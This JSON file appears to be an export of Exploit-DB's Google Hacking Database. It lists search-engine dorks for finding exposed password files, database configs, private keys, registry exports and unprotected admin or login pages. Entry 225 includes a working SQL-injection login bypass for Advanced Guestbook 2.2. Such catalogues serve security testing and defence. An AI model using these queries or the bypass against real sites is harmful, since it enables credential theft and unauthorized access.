"querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22index+of+cgi%2Dbin%22", "shortDescription": "\"index of cgi-bin\"", "textualDescription": "CGI directories contain scripts which can often be exploited by attackers. Regardless of the vulnerability of such scripts, a directory listing of these scripts can prove helpful." }, { "signatureReferenceNumber": "178", "link": "https://www.exploit-db.com/ghdb/178/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3ASnap.Server+inurl%3AFunc%3D", "shortDescription": "intitle:Snap.Server inurl:Func=", "textualDescription": "This page reveals the existance of a SNAP server (Netowrk attached server or NAS devices) Depending on the configuration, these servers may be vulnerable, but regardless the existance of this server is useful for information gathering." }, { "signatureReferenceNumber": "179", "link": "https://www.exploit-db.com/ghdb/179/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Aserver%2Dstatus+%22apache%22", "shortDescription": "inurl:server-status \"apache\"", "textualDescription": "This page shows all sort of information about the Apache web server. It can be used to track process information, directory maps, connection data, etc." }, { "signatureReferenceNumber": "180", "link": "https://www.exploit-db.com/ghdb/180/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=eggdrop+filetype%3Auser+user", "shortDescription": "eggdrop filetype:user user", "textualDescription": "These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users." }, { "signatureReferenceNumber": "181", "link": "https://www.exploit-db.com/ghdb/181/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intitle:%22index+of%22+intext:connect.inc+&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=10&sa=N", "shortDescription": "intitle:\"index of\" intext:connect.inc", "textualDescription": "These files often contain usernames and passwords for connection to mysql databases. In many cases, the passwords are not encoded or encrypted." }, { "signatureReferenceNumber": "182", "link": "https://www.exploit-db.com/ghdb/182/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22MikroTik+RouterOS+Managing+Webpage%22+", "shortDescription": "intitle:\"MikroTik RouterOS Managing Webpage\"", "textualDescription": "This is the front page entry point to a \"Mikro Tik\" Router." }, { "signatureReferenceNumber": "183", "link": "https://www.exploit-db.com/ghdb/183/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Afcgi-bin%2Fecho", "shortDescription": "inurl:fcgi-bin/echo", "textualDescription": "This is the fastcgi echo script, which provides a great deal of information including port numbers, server software versions, port numbers, ip addresses, path names, file names, time zone, process id's, admin email, fqdns, etc!" }, { "signatureReferenceNumber": "184", "link": "https://www.exploit-db.com/ghdb/184/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Acgi-bin%2Fprintenv", "shortDescription": "inurl:cgi-bin/printenv", "textualDescription": "This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more." }, { "signatureReferenceNumber": "185", "link": "https://www.exploit-db.com/ghdb/185/", "category": "Error Messages", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Execution+of+this+script+not+permitted%22+Contact+phone", "shortDescription": "intitle:\"Execution of this script not permitted\"", "textualDescription": "This is a cgiwrap error message which displays admin name and email, port numbers, path names, and may also include optional information like phone numbers for support personnel." }, { "signatureReferenceNumber": "186", "link": "https://www.exploit-db.com/ghdb/186/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aperl%2Fprintenv", "shortDescription": "inurl:perl/printenv", "textualDescription": "This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more." }, { "signatureReferenceNumber": "187", "link": "https://www.exploit-db.com/ghdb/187/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aj2ee%2Fexamples%2Fjsp", "shortDescription": "inurl:j2ee/examples/jsp", "textualDescription": "This directory contains sample JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server." }, { "signatureReferenceNumber": "188", "link": "https://www.exploit-db.com/ghdb/188/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aojspdemos", "shortDescription": "inurl:ojspdemos", "textualDescription": "This directory contains sample Oracle JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server." }, { "signatureReferenceNumber": "189", "link": "https://www.exploit-db.com/ghdb/189/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aserver-info+%22Apache+Server+Information%22", "shortDescription": "inurl:server-info \"Apache Server Information\"", "textualDescription": "This is the Apache server-info program. There is so much sensitive stuff listed on this page that it's hard to list it all here. Some informatino listed here includes server version and build, software versions, hostnames, ports, path info, modules installed, module info, configuration data and so much more...." }, { "signatureReferenceNumber": "190", "link": "https://www.exploit-db.com/ghdb/190/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Apls%2Fadmin_%2Fgateway.htm+", "shortDescription": "inurl:pls/admin_/gateway.htm", "textualDescription": "This is a default login portal used by Oracle. In addition to the fact that this file can be used to footprint a web server and determine it's version and software, this page has been targeted in many vulnerability reports as being a source of an SQL injection vulnerability. This problem, when exploited can lead to unauthorized privileges to the databse. In addition, this page may allow unauthorized modification of parameters on the server." }, { "signatureReferenceNumber": "191", "link": "https://www.exploit-db.com/ghdb/191/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:/pls/sample/admin_/help/&hl=en&lr=&ie=UTF-8&oe=UTF-8&filter=0", "shortDescription": "inurl:/pls/sample/admin_/help/", "textualDescription": "This is the default installation location of Oracle manuals. This helps in footprinting a server, allowing an attacker to determine software version information which may aid in an attack." }, { "signatureReferenceNumber": "192", "link": "https://www.exploit-db.com/ghdb/192/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Gateway+Configuration+Menu%22", "shortDescription": "intitle:\"Gateway Configuration Menu\"", "textualDescription": "This is a normally protected configuration menu for Oracle Portal Database Access Descriptors (DADs) and Listener settings. This page is normally password protected, but Google has uncovered sites which are not protected. Attackers can make changes to the servers found with this query." }, { "signatureReferenceNumber": "193", "link": "https://www.exploit-db.com/ghdb/193/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3ARemote.Desktop.Web.Connection+inurl%3Atsweb", "shortDescription": "intitle:\"Remote Desktop Web Connection\" inurl:tsweb", "textualDescription": "This is the login page for Microsoft's Remote Desktop Web Connection, which allows remote users to connect to (and optionally control) a user's desktop. Although authentication is built into this product, it is still possible to run this service without authentication. Regardless, this search serves as a footprinting mechanisms for an attacker." }, { "signatureReferenceNumber": "194", "link": "https://www.exploit-db.com/ghdb/194/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aphp+inurl%3Ahlstats+intext%3A%22Server+Username%22", "shortDescription": "inurl:php inurl:hlstats intext:\"Server Username\"", "textualDescription": "This page shows the halflife stat script and reveals the username to the system. Table structure, database name and recent SQL queries are also shown on most systems." }, { "signatureReferenceNumber": "195", "link": "https://www.exploit-db.com/ghdb/195/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intext%3A%22Tobias+Oetiker%22+%22traffic+analysis%22", "shortDescription": "intext:\"Tobias Oetiker\" \"traffic analysis\"", "textualDescription": "This is the MRTG traffic analysis pages. This page lists information about machines on the network including CPU load, traffic statistics, etc. This information can be useful in mapping out a network." }, { "signatureReferenceNumber": "196", "link": "https://www.exploit-db.com/ghdb/196/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Atdbin", "shortDescription": "inurl:tdbin", "textualDescription": "This is the default directory for TestDirector (http://www.mercuryinteractive.com/products/testdirector/). This program contains sensitive information including software defect data which should not be publically accessible." }, { "signatureReferenceNumber": "197", "link": "https://www.exploit-db.com/ghdb/197/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=Google+for%3A+%2Bintext%3A%22webalizer%22+%2Bintext%3A%22Total+Usernames%22+%2Bintext%3A%22Usage+Statistics+for%22", "shortDescription": "+intext:\"webalizer\" +intext:\"Total Usernames\" +intext:\"Usage Statistics for\"", "textualDescription": "The webalizer program displays various information but this query displays usernames that have logged into the site. Attckers can use this information to mount an attack." }, { "signatureReferenceNumber": "198", "link": "https://www.exploit-db.com/ghdb/198/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aperform+filetype%3Aini&btnG=Search", "shortDescription": "inurl:perform filetype:ini", "textualDescription": "Displays the perform.ini file used by the popular irc client mIRC. Often times has channel passwords and/or login passwords for nickserv." }, { "signatureReferenceNumber": "199", "link": "https://www.exploit-db.com/ghdb/199/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=nl&ie=UTF-8&oe=UTF-8&q=intitle%3A%22index+of%22+intext%3Aglobals.inc&lr=", "shortDescription": "intitle:\"index of\" intext:globals.inc", "textualDescription": "contains plaintext user/pass for mysql database" }, { "signatureReferenceNumber": "200", "link": "https://www.exploit-db.com/ghdb/200/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Apdf+%22Assessment+Report%22+nessus", "shortDescription": "filetype:pdf \"Assessment Report\" nessus", "textualDescription": "These are reports from the Nessus Vulnerability Scanner. These report contain detailed information about the vulnerabilities of hosts on a network, a veritable roadmap for attackers to folow." }, { "signatureReferenceNumber": "201", "link": "https://www.exploit-db.com/ghdb/201/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%22smb.conf%22+intext%3A%22workgroup%22+filetype%3Aconf+conf", "shortDescription": "inurl:\"smb.conf\" intext:\"workgroup\" filetype:conf conf", "textualDescription": "These are samba configuration files. They include information about the network, trust relationships, user accounts and much more. Attackers can use this information to recon a network." }, { "signatureReferenceNumber": "202", "link": "https://www.exploit-db.com/ghdb/202/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Samba+Web+Administration+Tool%22+intext%3A%22Help+Workgroup%22", "shortDescription": "intitle:\"Samba Web Administration Tool\" intext:\"Help Workgroup\"", "textualDescription": "This search reveals wide-open samba web adminitration servers. Attackers can change options on the server." }, { "signatureReferenceNumber": "203", "link": "https://www.exploit-db.com/ghdb/203/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Aproperties+inurl%3Adb+intext%3Apassword", "shortDescription": "filetype:properties inurl:db intext:password", "textualDescription": "The db.properties file contains usernames, decrypted passwords and even hostnames and ip addresses of database servers. This is VERY severe, earning the highest danger rating." }, { "signatureReferenceNumber": "204", "link": "https://www.exploit-db.com/ghdb/204/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Anames.nsf%3Fopendatabase", "shortDescription": "inurl:names.nsf?opendatabase", "textualDescription": "A Login portal for Lotus Domino servers. Attackers can attack this page or use it to gather information about the server." }, { "signatureReferenceNumber": "205", "link": "https://www.exploit-db.com/ghdb/205/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22index+of%22+inurl%3Arecycler", "shortDescription": "\"index of\" inurl:recycler", "textualDescription": "This is the default name of the Windows recycle bin. The files in this directory may contain sensitive information. Attackers can also crawl the directory structure of the site to find more information. In addition, the SID of a user is revealed also. An attacker could use this in a variety of ways." }, { "signatureReferenceNumber": "206", "link": "https://www.exploit-db.com/ghdb/206/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Aconf+inurl%3Afirewall+-intitle%3Acvs", "shortDescription": "filetype:conf inurl:firewall -intitle:cvs", "textualDescription": "These are firewall configuration files. Although these are often examples or sample files, in many cases they can still be used for information gathering purposes." }, { "signatureReferenceNumber": "207", "link": "https://www.exploit-db.com/ghdb/207/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=filetype%3Ainc+intext%3Amysql_connect", "shortDescription": "filetype:inc intext:mysql_connect", "textualDescription": "INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases. Very dangerous stuff. The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database." }, { "signatureReferenceNumber": "208", "link": "https://www.exploit-db.com/ghdb/208/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22HTTP_FROM%3Dgooglebot%22++googlebot.com+%22Server_Software%3D%22", "shortDescription": "\"HTTP_FROM=googlebot\" googlebot.com \"Server_Software=\"", "textualDescription": "These pages contain trace information that was collected when the googlebot crawled a page. The information can include many different things such as path names, header information, server software versions and much more. Attackers can use information like this to formulate an attack against a site." }, { "signatureReferenceNumber": "209", "link": "https://www.exploit-db.com/ghdb/209/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22Request+Details%22+%22Control+Tree%22+%22Server+Variables%22", "shortDescription": "\"Request Details\" \"Control Tree\" \"Server Variables\"", "textualDescription": "These pages contain a great deal of information including path names, session ID's, stack traces, port numbers, ip addresses, and much much more. Attackers can use this information to formulate a very advanced attack against these targets." }, { "signatureReferenceNumber": "210", "link": "https://www.exploit-db.com/ghdb/210/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Areg+reg+%2Bintext%3A%22defaultusername%22+%2Bintext%3A%22defaultpassword%22", "shortDescription": "filetype:reg reg +intext:\"defaultusername\" +intext:\"defaultpassword\"", "textualDescription": "These pages display windows registry keys which reveal passwords and/or usernames." }, { "signatureReferenceNumber": "211", "link": "https://www.exploit-db.com/ghdb/211/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Ametaframexp%2Fdefault%2Flogin.asp+%7C+intitle%3A%22Metaframe+XP+Login%22", "shortDescription": "inurl:metaframexp/default/login.asp | intitle:\"Metaframe XP Login\"", "textualDescription": "These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site." }, { "signatureReferenceNumber": "212", "link": "https://www.exploit-db.com/ghdb/212/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%2FCitrix%2FNfuse17%2F+", "shortDescription": "inurl:/Citrix/Nfuse17/", "textualDescription": "These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site." }, { "signatureReferenceNumber": "213", "link": "https://www.exploit-db.com/ghdb/213/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Awab+wab+", "shortDescription": "filetype:wab wab", "textualDescription": "These are Microsoft Outlook Mail address books. The information contained will vary, but at the least an attacker can glean email addresses and contact information." }, { "signatureReferenceNumber": "214", "link": "https://www.exploit-db.com/ghdb/214/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Areg+reg+HKEY_CURRENT_USER+username", "shortDescription": "filetype:reg reg HKEY_CURRENT_USER username", "textualDescription": "This search finds registry files from the Windows Operating system. Considered the \"soul\" of the system, these files, and snippets from these files contain sensitive information, in this case usernames and/or passwords." }, { "signatureReferenceNumber": "215", "link": "https://www.exploit-db.com/ghdb/215/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Areg+reg+HKEY_CURRENT_USER+SSHHOSTKEYS+", "shortDescription": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "textualDescription": "This search reveals SSH host key fro the Windows Registry. These files contain information about where the user connects including hostnames and port numbers, and shows sensitive information such as the SSH host key in use by that client." }, { "signatureReferenceNumber": "216", "link": "https://www.exploit-db.com/ghdb/216/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%2Ftmp+", "shortDescription": "inurl:/tmp", "textualDescription": "Many times, this search will reveal temporary files and directories on the web server. The information included in these files and directories will vary, but an attacker could use this information in an information gathering campaign." }, { "signatureReferenceNumber": "217", "link": "https://www.exploit-db.com/ghdb/217/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:mbx+mbx+intext:Subject&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=20&sa=N", "shortDescription": "filetype:mbx mbx intext:Subject", "textualDescription": "These searches reveal Outlook v 1-4 or Eudora mailbox files. Often these are made public on purpose, sometimes they are not. Either way, addresses and email text can be pulled from these files." }, { "signatureReferenceNumber": "218", "link": "https://www.exploit-db.com/ghdb/218/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22eMule+*%22+intitle:%22-+Web+Control+Panel%22+intext:%22Web+Control+Panel%22+%22Enter+your+password+here.%22&num=100&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "intitle:\"eMule *\" intitle:\"- Web Control Panel\" intext:\"Web Control Panel\" \"Enter your password here.\"", "textualDescription": "This iks the login page for eMule, the p2p file-sharing program. These pages forego the login name, prompting only for a password. Attackers can use this to profile a target, gather information and ultimately upload or download files from the target (which is a function of the emule program itself)" }, { "signatureReferenceNumber": "219", "link": "https://www.exploit-db.com/ghdb/219/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%22webadmin%22+filetype%3Ansf", "shortDescription": "inurl:\"webadmin\" filetype:nsf", "textualDescription": "This is a standard login page for Domino Web Administration." }, { "signatureReferenceNumber": "220", "link": "https://www.exploit-db.com/ghdb/220/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=filetype%3Areg+reg+%2Bintext%3A%22internet+account+manager", "shortDescription": "filetype:reg reg +intext:\"internet account manager\"", "textualDescription": "This google search reveals users names, pop3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases." }, { "signatureReferenceNumber": "221", "link": "https://www.exploit-db.com/ghdb/221/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&q=filetype%3Aeml+eml+%2Bintext%3A%22Subject%22+%2Bintext%3A%22From%22+%2Bintext%3A%22To%22", "shortDescription": "filetype:eml eml +intext:\"Subject\" +intext:\"From\" +intext:\"To\"", "textualDescription": "These are oulook express email files which contain emails, with full headers. The information in these emails can be useful for information gathering about a target." }, { "signatureReferenceNumber": "222", "link": "https://www.exploit-db.com/ghdb/222/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Avtund.conf+intext%3Apass+-cvs", "shortDescription": "inurl:vtund.conf intext:pass -cvs", "textualDescription": "Theses are vtund configuration files (http://vtun.sourceforge.net). Vtund is an encrypted tunneling program. The conf file holds plaintext passwords. Many sites use the default password, but some do not. Regardless, attackers can use this information to gather information about a site." }, { "signatureReferenceNumber": "223", "link": "https://www.exploit-db.com/ghdb/223/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3Alogin+filetype%3Aswf+swf", "shortDescription": "inurl:login filetype:swf swf", "textualDescription": "This search reveals sites which may be using Shockwave (Flash) as a login mechanism for a site. The usernames and passwords for this type of login mechanism are often stored in plaintext inside the source of the .swl file." }, { "signatureReferenceNumber": "224", "link": "https://www.exploit-db.com/ghdb/224/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=filetype%3Aurl+%2Binurl%3A%22ftp%3A%2F%2F%22++%2Binurl%3A%22@%22", "shortDescription": "filetype:url +inurl:\"ftp://\" +inurl:\"@\"", "textualDescription": "These are FTP Bookmarks, some of which contain plaintext login names and passwords." }, { "signatureReferenceNumber": "225", "link": "https://www.exploit-db.com/ghdb/225/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&q=intitle%3Aguestbook+%22advanced+guestbook+2.2+powered%22", "shortDescription": "intitle:guestbook \"advanced guestbook 2.2 powered\"", "textualDescription": "Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. AttackerFrom there, hit \"Admin\" then do the following:Leave username field blank.For password, enter this exactly:') OR ('a' = 'aYou are now in the Guestbook's Admin section.http://www.securityfocus.com/bid/10209" }, { "signatureReferenceNumber": "226", "link": "https://www.exploit-db.com/ghdb/226/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle:%22300+multiple+choices%22+intext:server.at&hl=en&lr=&ie=UTF-8&start=90&sa=N", "shortDescription": "intitle:\"300 multiple choices\"", "textualDescription": "This search shows sites that have the 300 error code, but also reveal a server tag at the bottom of the page that an attacker could use to profile a system." }, { "signatureReferenceNumber": "227", "link": "https://www.exploit-db.com/ghdb/227/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22index+of%22+mysql.conf+OR+mysql_config", "shortDescription": "intitle:\"index of\" mysql.conf OR mysql_config", "textualDescription": "This file contains port number, version number and path info to MySQL server." }, { "signatureReferenceNumber": "228", "link": "https://www.exploit-db.com/ghdb/228/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=filetype%3Alic+lic+intext%3Akey&btnG=Search", "shortDescription": "filetype:lic lic intext:key", "textualDescription": "License files for various software titles that may contain contact info and the product version, license, and registration in a .LIC file." }, { "signatureReferenceNumber": "229", "link": "https://www.exploit-db.com/ghdb/229/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22please+log+in%22", "shortDescription": "\"please log in\"", "textualDescription": "This is a simple search for a login page. Attackers view login pages as the \"front door\" to a site, but the information about where this page is stored and how it is presented can provide clues about breaking into a site." }, { "signatureReferenceNumber": "230", "link": "https://www.exploit-db.com/ghdb/230/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Alog+username+putty", "shortDescription": "filetype:log username putty", "textualDescription": "These log files record info about the SSH client PUTTY. These files contain usernames, site names, IP addresses, ports and various other information about the SSH server connected to." }, { "signatureReferenceNumber": "231", "link": "https://www.exploit-db.com/ghdb/231/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Alog+inurl%3A%22password.log%22", "shortDescription": "filetype:log inurl:\"password.log\"", "textualDescription": "These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user." }, { "signatureReferenceNumber": "232", "link": "https://www.exploit-db.com/ghdb/232/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22Dell+Remote+Access+Controller%22", "shortDescription": "intitle:\"Dell Remote Access Controller\"", "textualDescription": "This is the Dell Remote Access Controller that allows remote administration of a Dell server." }, { "signatureReferenceNumber": "233", "link": "https://www.exploit-db.com/ghdb/233/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&lr=&q=filetype%3Avsd+vsd+network+-samples+-examples&btnG=Search", "shortDescription": "filetype:vsd vsd network -samples -examples", "textualDescription": "Reveals network maps (or any other kind you seek) that can provide sensitive information such as internal IPs, protocols, layout, firewall locations and types, etc. Attackers can use these files in an information gathering campaign." }, { "signatureReferenceNumber": "234", "link": "https://www.exploit-db.com/ghdb/234/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?ie=utf-8&oe=utf-8&q=intitle%3Aintranet+inurl%3Aintranet+%2Bintext%3A%22human+resources%22", "shortDescription": "intitle:intranet inurl:intranet +intext:\"human resources\"", "textualDescription": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\"This search allows you to not only access a companies private network, but also provides employee listings and other sensitive information that can be incredibly useful for any social engineering endeavour" }, { "signatureReferenceNumber": "235", "link": "https://www.exploit-db.com/ghdb/235/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype:log+cron.log&spell=1", "shortDescription": "filetype:log cron.log", "textualDescription": "Displays logs from cron, the *nix automation daemon. Can be used to determine backups, full and realtive paths, usernames, IP addresses and port numbers of trusted network hosts, or just about anything the admin of the box decides to automate. An attacker could use this information to possibly determine what extra vulnerable services are running on the machine, to find the location of backups, and, if the sysadmin uses cron to backup their logfiles, this cron log will give that away too." }, { "signatureReferenceNumber": "236", "link": "https://www.exploit-db.com/ghdb/236/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Alog+access.log+-CVS&btnG=Google+Search", "shortDescription": "filetype:log access.log -CVS", "textualDescription": "These are http server access logs which contain all sorts of information ranging from usernames and passwords to trusted machines on the network to full paths on the server. Could be VERY useful in scoping out a potential target." }, { "signatureReferenceNumber": "237", "link": "https://www.exploit-db.com/ghdb/237/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?&ie=utf-8&oe=utf-8&q=filetype%3Ablt+blt+%2Bintext%3Ascreenname", "shortDescription": "filetype:blt blt +intext:screenname", "textualDescription": "Reveals AIM buddy lists, including screenname and who's on their 'buddy' list and their 'blocked' list." }, { "signatureReferenceNumber": "238", "link": "https://www.exploit-db.com/ghdb/238/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Adat+%22password.dat%22", "shortDescription": "filetype:dat \"password.dat\"", "textualDescription": "This file contains plaintext usernames and password. Deadly information in the hands of an attacker." }, { "signatureReferenceNumber": "239", "link": "https://www.exploit-db.com/ghdb/239/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3Aintranet+inurl%3Aintranet+%2Bintext%3A%22phone%22", "shortDescription": "intitle:intranet inurl:intranet +intext:\"phone\"", "textualDescription": "These pages are often private intranet pages which contain phone listings and email addresses. These pages can be used as a sort of online \"dumpster dive\"." }, { "signatureReferenceNumber": "240", "link": "https://www.exploit-db.com/ghdb/240/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=filetype%3Aconf+slapd%2Econf", "shortDescription": "filetype:conf slapd.conf", "textualDescription": "slapd.conf is the file that contains all the configuration for OpenLDAP, including the root password, all in clear text. Other useful information that can be gleaned from this file includes full paths of other related installed applications, the r/w/e permissions for various files, and a bunch of other stuff." }, { "signatureReferenceNumber": "241", "link": "https://www.exploit-db.com/ghdb/241/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Aphp.ini+filetype%3Aini", "shortDescription": "inurl:php.ini filetype:ini", "textualDescription": "The php.ini file contains all the configuration for how PHP is parsed on a server. It can contain default database usernames, passwords, hostnames, IP addresses, ports, initialization of global variables and other information. Since it is found by default in /etc, you might be able to find a lot more unrelated information in the same directory." }, { "signatureReferenceNumber": "242", "link": "https://www.exploit-db.com/ghdb/242/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=DOMCFG.NSF&hl=en&lr=&ie=UTF-8&start=0&sa=N", "shortDescription": "inurl:domcfg.nsf", "textualDescription": "This will return a listing of servers running Lotus Domino. These servers by default have very descriptive error messages which can be used to obtain path and OS information. In addition, adding \"Login Form Mapping\" to the search will allow you to see detailed information about a few of the servers that have this option enabled." }, { "signatureReferenceNumber": "243", "link": "https://www.exploit-db.com/ghdb/243/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=filetype%3Apem+pem+intext%3Aprivate", "shortDescription": "filetype:pem intext:private", "textualDescription": "This search will find private key files... Private key files are supposed to be, well... private." }, { "signatureReferenceNumber": "244", "link": "https://www.exploit-db.com/ghdb/244/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&safe=off&q=%22Mercury+Version%22+%22Infrastructure+Group%22&spell=1", "shortDescription": "\"Mecury Version\" \"Infastructure Group\"", "textualDescription": "Mecury is a centralized ground control program for research satellites. This query simply locates servers running this software. As it seems to run primarily on PHP and MySQL, there are many possible vulnerabilities associated with it." }, { "signatureReferenceNumber": "245", "link": "https://www.exploit-db.com/ghdb/245/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?q=filetype%3Aconf+inurl%3Aproftpd.conf+-sample+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8", "shortDescription": "filetype:conf inurl:proftpd.conf -sample", "textualDescription": "A standard FTP configuration file that provides far too many details about how the server is setup, including installation paths, location of logfiles, generic username and associated group, etc" }, { 